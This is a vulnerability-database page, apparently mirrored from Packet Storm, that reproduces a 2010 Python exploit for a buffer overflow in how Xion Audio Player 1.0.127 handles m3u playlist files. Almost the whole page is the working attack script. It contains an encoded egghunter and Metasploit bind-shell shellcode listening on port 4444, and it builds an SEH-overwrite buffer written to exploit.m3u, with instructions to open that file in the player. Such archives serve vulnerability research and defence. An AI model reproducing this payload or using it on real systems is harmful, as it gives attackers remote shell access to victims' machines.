Lucene search

K

Xion Audio Player 1.0.127 Buffer Overflow

🗓️ 23 Nov 2010 00:00:00Reported by 0v3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Xion Audio Player 1.0.127 Buffer Overflow, Vulnerability in m3u file processin

Show more
Code
`# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability  
# Date: 11/23/2010  
# Author: 0v3r  
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe  
# Version: 1.0.127  
# Tested on: Windows XP SP3 EN  
# CVE: N/A  
  
#!/usr/bin/python  
  
# encoded with alpha3 encoder by skylined  
egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAI"  
"AJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO"  
"0B0R1ZKR0X8MNNOLKU0Z2TJO6X2W00002T4KJZ6O2U9Z6O2U9WKO9WKPA")  
  
#win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com  
shellcode= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49"  
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x47"  
"\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41\x57\x42\x32\x42\x41\x32"  
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x4d\x39\x49\x6c\x33"  
"\x5a\x48\x6b\x42\x6d\x38\x68\x5a\x59\x6b\x4f\x49\x6f\x4b\x4f\x63"  
"\x50\x6c\x4b\x30\x6c\x64\x64\x64\x64\x6c\x4b\x50\x45\x67\x4c\x4c"  
"\x4b\x51\x6c\x37\x75\x61\x68\x76\x61\x58\x6f\x4e\x6b\x52\x6f\x72"  
"\x38\x4c\x4b\x73\x6f\x45\x70\x43\x31\x68\x6b\x31\x59\x4c\x4b\x70"  
"\x34\x4c\x4b\x57\x71\x7a\x4e\x34\x71\x4f\x30\x6e\x79\x6c\x6c\x6b"  
"\x34\x6f\x30\x43\x44\x33\x37\x6b\x71\x69\x5a\x76\x6d\x53\x31\x49"  
"\x52\x5a\x4b\x4c\x34\x45\x6b\x52\x74\x41\x34\x54\x68\x50\x75\x38"  
"\x65\x6c\x4b\x63\x6f\x54\x64\x53\x31\x38\x6b\x43\x56\x4e\x6b\x36"  
"\x6c\x72\x6b\x4e\x6b\x53\x6f\x75\x4c\x34\x41\x78\x6b\x64\x43\x64"  
"\x6c\x6e\x6b\x4b\x39\x50\x6c\x41\x34\x65\x4c\x52\x41\x7a\x63\x64"  
"\x71\x69\x4b\x51\x74\x6e\x6b\x71\x53\x66\x50\x4c\x4b\x77\x30\x74"  
"\x4c\x6c\x4b\x74\x30\x45\x4c\x4c\x6d\x6e\x6b\x43\x70\x33\x38\x73"  
"\x6e\x53\x58\x4c\x4e\x50\x4e\x64\x4e\x38\x6c\x46\x30\x6b\x4f\x4e"  
"\x36\x65\x36\x61\x43\x63\x56\x33\x58\x36\x53\x34\x72\x71\x78\x44"  
"\x37\x34\x33\x46\x52\x41\x4f\x42\x74\x6b\x4f\x48\x50\x65\x38\x5a"  
"\x6b\x7a\x4d\x39\x6c\x45\x6b\x52\x70\x4b\x4f\x6a\x76\x71\x4f\x4e"  
"\x69\x6d\x35\x50\x66\x6d\x51\x7a\x4d\x63\x38\x33\x32\x32\x75\x50"  
"\x6a\x43\x32\x79\x6f\x38\x50\x45\x38\x68\x59\x73\x39\x4c\x35\x4e"  
"\x4d\x56\x37\x6b\x4f\x6a\x76\x76\x33\x30\x53\x71\x43\x76\x33\x71"  
"\x43\x41\x53\x76\x33\x73\x73\x71\x43\x6b\x4f\x4e\x30\x71\x76\x31"  
"\x78\x37\x61\x41\x4c\x70\x66\x46\x33\x4b\x39\x48\x61\x6d\x45\x70"  
"\x68\x39\x34\x57\x6a\x30\x70\x4b\x77\x72\x77\x6b\x4f\x78\x56\x31"  
"\x7a\x46\x70\x61\x41\x63\x65\x6b\x4f\x4e\x30\x35\x38\x6c\x64\x6c"  
"\x6d\x36\x4e\x6d\x39\x46\x37\x6b\x4f\x5a\x76\x42\x73\x71\x45\x59"  
"\x6f\x68\x50\x75\x38\x6b\x55\x37\x39\x6c\x46\x67\x39\x46\x37\x69"  
"\x6f\x4a\x76\x70\x50\x73\x64\x46\x34\x61\x45\x6b\x4f\x78\x50\x6d"  
"\x43\x42\x48\x6b\x57\x54\x39\x6b\x76\x50\x79\x50\x57\x6b\x4f\x48"  
"\x56\x70\x55\x49\x6f\x6a\x70\x45\x36\x41\x7a\x73\x54\x75\x36\x62"  
"\x48\x65\x33\x30\x6d\x6e\x69\x7a\x45\x30\x6a\x52\x70\x63\x69\x75"  
"\x79\x48\x4c\x4f\x79\x6d\x37\x71\x7a\x57\x34\x6e\x69\x58\x62\x67"  
"\x41\x6b\x70\x69\x63\x6e\x4a\x4b\x4e\x77\x32\x66\x4d\x6b\x4e\x41"  
"\x52\x66\x4c\x5a\x33\x6c\x4d\x51\x6a\x66\x58\x6e\x4b\x4c\x6b\x4e"  
"\x4b\x42\x48\x70\x72\x69\x6e\x78\x33\x67\x66\x6b\x4f\x70\x75\x67"  
"\x34\x4b\x4f\x4e\x36\x33\x6b\x70\x57\x56\x32\x50\x51\x46\x31\x46"  
"\x31\x41\x7a\x54\x41\x30\x51\x41\x41\x66\x35\x30\x51\x69\x6f\x4e"  
"\x30\x50\x68\x6c\x6d\x5a\x79\x77\x75\x4a\x6e\x52\x73\x39\x6f\x58"  
"\x56\x30\x6a\x4b\x4f\x6b\x4f\x50\x37\x59\x6f\x6e\x30\x6c\x4b\x36"  
"\x37\x79\x6c\x6d\x53\x78\x44\x31\x74\x4b\x4f\x6b\x66\x30\x52\x69"  
"\x6f\x6e\x30\x65\x38\x6a\x50\x6e\x6a\x76\x64\x73\x6f\x63\x63\x49"  
"\x6f\x4b\x66\x69\x6f\x4e\x30\x47")  
  
junk = "A" * 221  
  
nseh = "\x61" #popad  
nseh += "\x6e" #nop/align  
  
seh = "\x7b\x41" # POP POP RET  
  
#fix eax to point to the egghunter  
prepare = "\x6e" #nop/align  
prepare += "\x05\x14\x11" #add eax,0x11001400  
prepare += "\x6e" #nop/align  
prepare += "\x2d\x13\x11" #sub eax,0x11001300  
prepare += "\x6e" #nop/alignn  
  
#jump to eax  
jump = "\x50" #push eax  
jump +="\x6e" #nop/align  
jump += "\xc3" #retn  
  
#align buffer to hit the egghunter  
align = "D" * 112  
  
#few junk before shellcode  
preshell = "D" * 500  
  
#the egghunters tag  
egg = "w00tw00t"  
  
#few more junk after our shellcode  
#I noticed that the bigger the buffer the more reliable the exploit  
postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg + preshell + shellcode ))  
  
#the final buffer  
buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell  
  
try:  
f = open("exploit.m3u",'w')  
f.write(buff)  
f.close()  
  
print "\n"   
print "\t-----------------------------------------------------------------"  
print "\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |"  
print "\t-----------------------------------------------------------------"  
print "\n"  
  
print "\t- File successfully created..."  
print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n"  
except:  
print "\t-Oooops! Can't write file ...\n"  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo